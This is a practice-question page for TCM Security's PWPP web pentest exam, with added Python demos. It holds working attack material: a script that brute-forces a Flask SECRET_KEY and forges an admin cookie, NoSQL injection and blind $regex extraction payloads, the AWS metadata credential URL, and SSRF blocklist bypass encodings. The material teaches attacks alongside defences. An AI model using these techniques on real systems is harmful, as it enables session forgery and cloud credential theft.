100+ Free PWPP Practice Questions

TCM Security Practical Web Pentest Professional practice questions are available now; exam metadata is being verified.

A web application uses Flask-Login for session management. The session cookie is base64-encoded and contains `{"user_id": 42, "is_admin": false}` signed with a weak Flask SECRET_KEY. An attacker uses flask-unsign to brute-force the secret. Which command correctly performs this attack?
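The question above is missing its answer options on this page, so here is the attack itself as an added example (not code from the page, from TCM Security, or from flask-unsign): a reimplementation of the signature check flask-unsign performs when brute-forcing a Flask `SECRET_KEY`. Flask signs its session cookie with itsdangerous as `<payload>.<timestamp>.<signature>`, where the payload is URL-safe base64 of JSON (zlib-compressed with a leading `.` when that is shorter) and the signature is HMAC-SHA1 keyed with HMAC-SHA1(SECRET_KEY, `cookie-session`). The secret `s3cr3t` and the wordlist are constructed for the demo.

```python
"""Added example: what `flask-unsign --unsign --wordlist` does under the hood.

Not flask-unsign's code. Implements Flask's cookie signing (itsdangerous,
SHA1, key_derivation="hmac", salt "cookie-session") so a constructed cookie
can be decoded, brute-forced and then re-signed with the recovered key.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import List, Optional

SALT = b"cookie-session"  # Flask's SecureCookieSessionInterface.salt

# Constructed wordlist for the demo; a real run uses rockyou.txt or
# flask-unsign's bundled list.
WORDLIST = ["password", "changeme", "secret", "s3cr3t", "flask123", "supersecretkey"]


def _b64encode(data: bytes) -> bytes:
    # itsdangerous base64: URL-safe alphabet, padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _b64decode(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _signature(secret: bytes, signed_value: bytes) -> bytes:
    # Signing key = HMAC-SHA1(SECRET_KEY, salt); signature = HMAC-SHA1(key, "<payload>.<timestamp>")
    derived = hmac.new(secret, SALT, hashlib.sha1).digest()
    return _b64encode(hmac.new(derived, signed_value, hashlib.sha1).digest())


def sign_session(session: dict, secret: str, timestamp: Optional[int] = None) -> str:
    """Build a cookie the way Flask/itsdangerous does. Used to create the target
    cookie and, once the key is known, to forge is_admin=true."""
    raw = json.dumps(session, separators=(",", ":")).encode()
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:           # itsdangerous compresses when it pays off
        payload = b"." + _b64encode(compressed)   # leading "." flags zlib
    else:
        payload = _b64encode(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    signed_value = payload + b"." + _b64encode(ts_bytes)
    return (signed_value + b"." + _signature(secret.encode(), signed_value)).decode()


def decode_session(cookie: str) -> dict:
    """Read the payload without a key (what `flask-unsign --decode` prints)."""
    payload = cookie.encode().rsplit(b".", 2)[0]
    if payload.startswith(b"."):
        return json.loads(zlib.decompress(_b64decode(payload[1:])))
    return json.loads(_b64decode(payload))


def verify(cookie: str, secret: str) -> bool:
    payload, ts_b64, sig = cookie.encode().rsplit(b".", 2)
    return hmac.compare_digest(sig, _signature(secret.encode(), payload + b"." + ts_b64))


def brute_force(cookie: str, wordlist: List[str]) -> Optional[str]:
    """Try each candidate key until the recomputed signature matches."""
    for candidate in wordlist:
        if verify(cookie, candidate):
            return candidate
    return None


if __name__ == "__main__":
    target = sign_session({"user_id": 42, "is_admin": False}, "s3cr3t")
    print("cookie:", target)
    print("payload:", decode_session(target))
    key = brute_force(target, WORDLIST)
    print("recovered SECRET_KEY:", key)
    print("forged admin cookie:", sign_session({"user_id": 42, "is_admin": True}, key))
```

With the real tool the same three steps are `flask-unsign --decode --cookie '<cookie>'`, `flask-unsign --unsign --cookie '<cookie>' --wordlist rockyou.txt`, and `flask-unsign --sign --cookie "{'user_id': 42, 'is_admin': True}" --secret 's3cr3t'`. The brute force is cheap because the signature is a single SHA1 HMAC per guess; the only real defence is a long random `SECRET_KEY`, and authorization decisions should not rest on client-held flags like `is_admin` in the first place.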


Key Facts: PWPP Exam (figures as listed by TCM Security; see the verification note at the end of this page)

Exam cost: $499
Assessment window: 3 days
Report submission deadline: 2 days after the assessment window
Retake included: 1 free
Included course content: 16+ hours
Credential validity: non-expiring

Source for all figures: TCM Security

The PWPP is TCM Security's practical web pentest certification, aimed at intermediate-to-advanced practitioners. The 3-day hands-on exam tests real-world exploitation skills: NoSQL injection, SSRF (including cloud metadata endpoints), SSTI (Jinja2/Twig/Freemarker), race conditions with Turbo Intruder, OAuth/JWT attack chains, mass assignment, WAF bypass, and chaining vulnerabilities together. A professionally written report must be submitted within 2 days after the assessment window closes. The $499 fee includes one free retake and 12 months of access to the Practical Web Hacking and Practical API Hacking courses. There are no flags and no multiple-choice questions; the exam is run as a realistic engagement.

Sample PWPP Practice Questions

Try these sample questions to test your PWPP exam readiness. Each question includes a detailed explanation.

1. A web application uses MongoDB and constructs a login query as `db.users.find({username: req.body.username, password: req.body.password})`. An attacker submits `{"username": "admin", "password": {"$ne": null}}`. What type of attack is this?
A. NoSQL injection using MongoDB operator injection
B. SQL injection using UNION-based technique
C. LDAP injection exploiting DN metacharacters
D. XML injection targeting XPath queries
Explanation: This is NoSQL injection through MongoDB's operator syntax. Because the request body is parsed as JSON and passed into the query unchanged, `{"$ne": null}` arrives as an operator object rather than a string, and the password clause matches any document whose password is not null, so authentication succeeds without a credential. Operators such as `$ne`, `$gt`, `$regex`, and `$where` can be injected wherever user input reaches query construction as an object; the fix is to coerce each input to the expected scalar type (or reject keys beginning with `$`) before building the query.
2. When testing a MongoDB application for NoSQL injection, which of the following payloads injected in a URL parameter is most likely to cause an authentication bypass via operator injection?
A. ' OR '1'='1
B. admin'--
C. [$ne]=invalid
D. 1; DROP TABLE users--
Explanation: `[$ne]=invalid` exploits how PHP, and frameworks that parse bracketed query parameters into nested objects (Express with its `qs`-based extended parser, for example), turn `password[$ne]=invalid` into `{"password": {"$ne": "invalid"}}`. That injects the `$ne` (not equal) operator into the query, so the clause is true for any stored value other than `invalid`, which bypasses authentication. The other three payloads are SQL injection syntax and have no meaning to a MongoDB query.
3. An application endpoint processes JSON and is vulnerable to NoSQL injection. To extract data character-by-character from a MongoDB field using blind injection, which operator would an attacker use?
A. $where with JavaScript sleep for time-based inference
B. $text for full-text search index abuse
C. $regex to test field values matching partial patterns
D. $lookup to join across collections and extract data
Explanation: `$regex` enables boolean-based blind NoSQL injection. A payload such as `{"password": {"$regex": "^a"}}` asks whether the stored value starts with `a`, and the attacker reads the answer from a visible difference in the response (login succeeds vs. fails). Extending the prefix one character at a time recovers the full value, exactly as in boolean-based blind SQL injection but using MongoDB's native regex matching. `$where` with a JavaScript delay is the time-based alternative when responses are otherwise indistinguishable.
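Questions 1 to 3 all come down to one mistake: a JSON object reaching the query where a string was expected. The following added example (not the application's code and not MongoDB) implements just enough of MongoDB's matching semantics (`$ne`, `$gt`, `$regex`) over a constructed user collection to run all three attacks offline: the `{"$ne": null}` bypass, the bracketed query-string form `password[$ne]=invalid`, and the `$regex` prefix loop that recovers a password character by character. The sanitiser at the end is the fix; the collection contents and alphabet are constructed for the demo.

```python
"""Added example: operator injection, bracket-parameter injection and blind
$regex extraction against a toy MongoDB-style matcher (not MongoDB itself)."""
import re
from urllib.parse import parse_qsl

# Constructed sample collection (not real data).
USERS = [
    {"username": "admin", "password": "Winter2024!"},
    {"username": "alice", "password": "hunter2"},
]
ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%"


def _match_value(stored, cond) -> bool:
    """One field condition; a dict is an operator object, as in MongoDB."""
    if not isinstance(cond, dict):
        return stored == cond
    for op, arg in cond.items():
        if op == "$ne":
            if stored == arg:
                return False
        elif op == "$gt":
            if stored is None or not stored > arg:
                return False
        elif op == "$regex":
            if stored is None or not re.search(arg, str(stored)):
                return False
        else:
            raise ValueError(f"unsupported operator {op}")
    return True


def find(collection, query):
    return [doc for doc in collection
            if all(_match_value(doc.get(k), v) for k, v in query.items())]


def login(username, password):
    """The vulnerable pattern from question 1: body values go straight into the query."""
    return find(USERS, {"username": username, "password": password})


def parse_bracket_params(qs: str) -> dict:
    """Question 2: `password[$ne]=invalid` becomes {"password": {"$ne": "invalid"}},
    as PHP and Express's qs-based extended parser do."""
    out = {}
    for key, value in parse_qsl(qs):
        m = re.fullmatch(r"(\w+)\[(\$?\w+)\]", key)
        if m:
            out.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            out[key] = value
    return out


def blind_extract(username: str, alphabet: str = ALPHABET, max_len: int = 64) -> str:
    """Question 3: boolean-based blind extraction, one login probe per guess."""
    known = ""
    while len(known) < max_len:
        for ch in alphabet:
            if login(username, {"$regex": "^" + re.escape(known + ch)}):
                known += ch
                break
        else:
            return known            # no character extends the prefix: value complete
    return known


def sanitize(value):
    """The fix: only scalars may reach the query (what mongo-sanitize / type
    coercion achieve). Operator objects are rejected outright."""
    if isinstance(value, (dict, list)):
        raise ValueError("operator object in user input")
    return value


def safe_login(username, password):
    return find(USERS, {"username": sanitize(username), "password": sanitize(password)})


if __name__ == "__main__":
    print("operator bypass:", login("admin", {"$ne": None}))
    q = parse_bracket_params("username=admin&password[$ne]=invalid")
    print("bracket bypass:", q, login(**q))
    print("extracted:", blind_extract("admin"))
```

The blind loop costs one request per alphabet character per position, which is why real tooling narrows the alphabet first (`[a-m]` style ranges) before testing single characters.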
4. A banking application transfers funds through a POST endpoint. Two simultaneous requests are sent to transfer the same $500 balance to different accounts. Both requests read the balance as $500 and proceed. This results in $1000 being transferred despite only $500 existing. What vulnerability class is this?
A. Race condition / TOCTOU vulnerability
B. Insecure Direct Object Reference (IDOR)
C. Mass assignment via unfiltered parameters
D. Business logic flaw via parameter tampering
Explanation: This is a race condition, specifically a time-of-check to time-of-use (TOCTOU) flaw. Both requests read the balance (time-of-check), both see $500 available, and both debit (time-of-use) before either write commits, so the check that was meant to protect the balance is satisfied twice. Mitigations make the check and the write one atomic step: a database transaction with row locks (`SELECT ... FOR UPDATE`), optimistic locking with a version column, or a conditional update such as `UPDATE accounts SET balance = balance - 500 WHERE id = ? AND balance >= 500`, whose affected-row count tells the application whether it won.
5. Which Burp Suite feature is specifically designed to send multiple identical or crafted HTTP requests simultaneously to exploit race conditions?
A. Repeater with multiple tabs synchronized
B. Intruder with Pitchfork attack type
C. Turbo Intruder with race-condition script
D. Scanner with active race-condition check
Explanation: Turbo Intruder is a Burp Suite extension purpose-built for sending large numbers of HTTP requests with precise timing control. Its race-condition example scripts use the HTTP/2 single-packet attack, or last-byte synchronization over HTTP/1.1, so that many requests land inside the same server-side processing window, which is what a TOCTOU race needs. The bundled `race-single-packet-attack.py` template exists for exactly this scenario. (Repeater's "send group in parallel" option can also fire a handful of tabs together, but it is not built for the volume or timing control Turbo Intruder offers.)
6. An application uses a single-use discount coupon system. After redeeming a coupon, the server marks it as used in the database. A tester submits 20 redemption requests simultaneously using Turbo Intruder. The coupon is applied 3 times before the 'used' flag is set. Which technique most effectively prevents this?
A. Rate limiting the redemption endpoint to 1 request per second
B. Implementing client-side validation before server processing
C. Using a database-level unique constraint and atomic upsert on coupon redemption
D. Adding a CAPTCHA to the redemption form
Explanation: A database-level unique constraint combined with an atomic statement ensures only one redemption succeeds under concurrent load: for example `INSERT INTO redemptions (coupon_code) VALUES (?)` against a unique index on `coupon_code` (the second insert fails), or `UPDATE coupons SET used = true WHERE code = ? AND used = false RETURNING id` (only the first statement to run matches a row). The database enforces mutual exclusion at the storage layer, closing the TOCTOU window that application-level check-then-act logic leaves open. Rate limiting and CAPTCHAs can be bypassed and do not remove the window, and client-side validation is not a server-side control at all.
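Questions 4 and 6 describe the same window from the attacker's and the defender's side. The added example below (not the banking or coupon application's code, and not Turbo Intruder) reproduces the coupon race against SQLite with 20 threads: once with the vulnerable check-then-act sequence, once with the conditional `UPDATE ... WHERE used = 0` whose row count decides who won. A `threading.Barrier` stands in for Turbo Intruder's request alignment, forcing every worker to finish its read before any worker writes, which is the window a single-packet attack tries to hit. The schema, coupon code and thread count are constructed for the demo.

```python
"""Added example: coupon redemption race, check-then-act vs. atomic conditional
UPDATE, against a temporary SQLite database (not the application's own code)."""
import os
import sqlite3
import tempfile
import threading
from concurrent.futures import ThreadPoolExecutor

COUPON = "SAVE50"  # constructed coupon code


def _fresh_db() -> str:
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, used INTEGER NOT NULL DEFAULT 0)")
    conn.execute("INSERT INTO coupons (code, used) VALUES (?, 0)", (COUPON,))
    conn.commit()
    conn.close()
    return path


def redeem_check_then_act(path: str, barrier: threading.Barrier) -> bool:
    """Vulnerable: read the flag, decide, then write. Nothing ties the two steps together."""
    conn = sqlite3.connect(path, timeout=10)
    (used,) = conn.execute("SELECT used FROM coupons WHERE code = ?", (COUPON,)).fetchone()
    conn.close()
    barrier.wait()                  # every 'request' has passed the check before any write
    if used:
        return False
    conn = sqlite3.connect(path, timeout=10)
    conn.execute("UPDATE coupons SET used = 1 WHERE code = ?", (COUPON,))
    conn.commit()
    conn.close()
    return True                     # discount applied


def redeem_atomic(path: str, barrier: threading.Barrier) -> bool:
    """Fixed: the check is part of the write. The database serialises writers, so
    exactly one UPDATE matches a row (rowcount == 1); the rest match nothing."""
    conn = sqlite3.connect(path, timeout=10)
    barrier.wait()                  # requests arrive together, as in the attack
    cur = conn.execute("UPDATE coupons SET used = 1 WHERE code = ? AND used = 0", (COUPON,))
    conn.commit()
    conn.close()
    return cur.rowcount == 1


def run(redeem, n_requests: int = 20) -> int:
    """Fire n concurrent redemptions and return how many times the discount applied."""
    path = _fresh_db()
    barrier = threading.Barrier(n_requests)
    try:
        with ThreadPoolExecutor(max_workers=n_requests) as pool:
            results = list(pool.map(lambda _: redeem(path, barrier), range(n_requests)))
        return sum(results)
    finally:
        os.remove(path)


if __name__ == "__main__":
    print("check-then-act applied the coupon", run(redeem_check_then_act), "times")
    print("atomic update applied the coupon", run(redeem_atomic), "times")
```

The barrier makes the worst case deterministic (all 20 reads precede all writes), whereas the question's "3 times" is what you typically see in the wild when only some requests land inside the window. The atomic version works on any SQL engine because it relies on the write lock, not on application code; with PostgreSQL you would add `RETURNING id` to get the winner's row back in the same statement.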
7. A REST API uses a Node.js/Express framework and automatically binds all JSON body parameters directly to a Mongoose model: `User.create(req.body)`. An attacker sends `{"username": "attacker", "email": "a@b.com", "isAdmin": true}`. The `isAdmin` field is silently set. What vulnerability is this?
A. Insecure Deserialization via JSON payload
B. Prototype Pollution via __proto__ injection
C. Mass Assignment vulnerability
D. Broken Object Level Authorization
Explanation: Mass assignment occurs when an application binds user-controlled input to model properties without restricting which fields may be set. Because `User.create(req.body)` hands the whole body to the ORM, every schema field, including `isAdmin`, is writable, and the attacker registers a privileged account. The fix is an allowlist: copy only the permitted fields into the model (explicit property assignment, a validation schema that rejects unknown keys, or a picked subset of `req.body`) and never pass `req.body` to `create` or `update` directly. Mongoose's strict mode only drops keys that are not in the schema; it does nothing for schema fields the client should not control.
8. During API testing, you discover a PUT /api/users/profile endpoint that accepts JSON. The API documentation only mentions `name`, `email`, and `bio` fields. Which Burp Suite technique best helps identify hidden mass-assignable parameters?
A. Send the request to Repeater and manually add common field names like role, admin, isVerified
B. Use Intruder Sniper mode with a wordlist of common parameter names to fuzz the JSON body
C. Enable Burp Scanner passive checks on the endpoint response
D. Use the Param Miner extension to discover undocumented parameters via response comparison
Explanation: Param Miner is a Burp Suite extension built to discover hidden, undocumented, or unused parameters that an application accepts but does not advertise. It guesses parameter names from a built-in wordlist and compares each response against a baseline to find names that change server behaviour. For mass-assignment testing it can surface backend model fields absent from the API documentation, because a response that echoes the stored object (or returns a validation error) changes as soon as an unknown but bound field is submitted.
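As an added example for questions 7 and 8 (not the application's code and not Param Miner), the block below places a Mongoose-style "bind every schema field" profile update next to an allowlisted one, then runs the response-comparison loop that Param Miner automates against both, in-process. The user record, the documented field list, the schema field list and the candidate parameter names are all constructed for the demo.

```python
"""Added example: mass-assignment binder vs. allowlist, plus Param Miner-style
hidden parameter discovery by response comparison (not Param Miner's code)."""
import copy
import json
from typing import Callable, Iterable, List

DOCUMENTED_FIELDS = {"name", "email", "bio"}
# Every field on the model (what a strict Mongoose schema would bind);
# isAdmin and isVerified exist but are never mentioned in the API docs.
MODEL_FIELDS = {"name", "email", "bio", "isAdmin", "isVerified"}
CANDIDATES = ["role", "admin", "isAdmin", "isVerified", "balance", "password"]

# Constructed backing record (not real data).
USER = {"id": 7, "name": "alice", "email": "alice@example.com", "bio": "",
        "isAdmin": False, "isVerified": False}


def update_profile_vulnerable(user: dict, body: dict) -> dict:
    """Equivalent of `User.findByIdAndUpdate(id, req.body)`: strict mode drops
    keys outside the schema, but every schema field is writable by the client."""
    user = copy.deepcopy(user)
    user.update({k: v for k, v in body.items() if k in MODEL_FIELDS})
    return user                      # the API echoes the stored document


def update_profile_safe(user: dict, body: dict) -> dict:
    """Allowlist: only documented, client-owned fields are copied."""
    user = copy.deepcopy(user)
    user.update({k: v for k, v in body.items() if k in DOCUMENTED_FIELDS})
    return user


def discover_hidden_params(endpoint: Callable[[dict, dict], dict], user: dict,
                           candidates: Iterable[str]) -> List[str]:
    """Param Miner's idea in miniature: send a baseline request, then one request
    per candidate name carrying a marker value, and keep every candidate whose
    response differs from the baseline."""
    base_body = {"bio": "probe"}
    baseline = json.dumps(endpoint(user, base_body), sort_keys=True)
    hits = []
    for name in candidates:
        probe = dict(base_body, **{name: "PMINER_CANARY"})
        if json.dumps(endpoint(user, probe), sort_keys=True) != baseline:
            hits.append(name)
    return hits


if __name__ == "__main__":
    print("vulnerable:", discover_hidden_params(update_profile_vulnerable, USER, CANDIDATES))
    print("allowlisted:", discover_hidden_params(update_profile_safe, USER, CANDIDATES))
```

In a real target the "response" is the full HTTP body and headers, so the comparison needs the same noise filtering Param Miner applies (timestamps, request IDs); a type error from the canary landing in a boolean field is just as good a signal as the canary being echoed back.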
9. A web application fetches a URL specified by the user: `fetch(req.body.url)`. An attacker submits `http://169.254.169.254/latest/meta-data/iam/security-credentials/`. The server returns AWS IAM credentials. What is this attack?
A. Server-Side Request Forgery (SSRF) targeting cloud metadata
B. Open Redirect to internal metadata service
C. XML External Entity (XXE) injection via URL parameter
D. Remote File Inclusion (RFI) exploiting the URL loader
Explanation: This is Server-Side Request Forgery (SSRF). The server-side fetch makes an HTTP request on the attacker's behalf to the AWS Instance Metadata Service (IMDS) at the link-local address 169.254.169.254. That service is reachable only from inside the EC2 instance, so the server's network position is abused to retrieve the instance role's temporary IAM credentials, which can then be used against AWS APIs. Mitigations include enforcing IMDSv2 (a session token obtained with a PUT request, plus a default hop limit of 1, neither of which a plain server-side GET satisfies), allowlisting permitted destinations, and blocking link-local ranges from the application's egress path.
10. An SSRF filter blocks requests to `169.254.169.254`. Which bypass technique most likely succeeds against a naive blocklist implementation?
A. Encoding the IP as `%31%36%39%2E%32%35%34%2E%31%36%39%2E%32%35%34` (URL encoding)
B. Appending a port number: `169.254.169.254:80`
C. Using the decimal representation `2852039166` or IPv6 equivalent `::ffff:169.254.169.254`
D. Adding a path traversal: `169.254.169.254/../../etc/passwd`
Explanation: A blocklist that looks for the literal string `169.254.169.254` is bypassed by any other spelling of the same address. The decimal integer `2852039166` (169·2^24 + 254·2^16 + 169·2^8 + 254) is accepted by most socket layers and connects to the same host, and the IPv4-mapped IPv6 form `::ffff:169.254.169.254` reaches the same link-local destination while matching no string check. Appending a port or a path leaves the literal intact, and URL encoding is usually undone before the filter runs. Proper SSRF mitigation allowlists destinations, resolves the hostname server-side and compares the resulting IP address (as an address type, not a string) against link-local, private and loopback ranges, connects to that checked address rather than re-resolving, and blocks those ranges at the network layer as a second line.

About the PWPP Practice Questions

Verified exam format metadata for TCM Security Practical Web Pentest Professional is pending. The practice questions above remain available while official exam length, timing, passing score, fee, and administrator details are reviewed.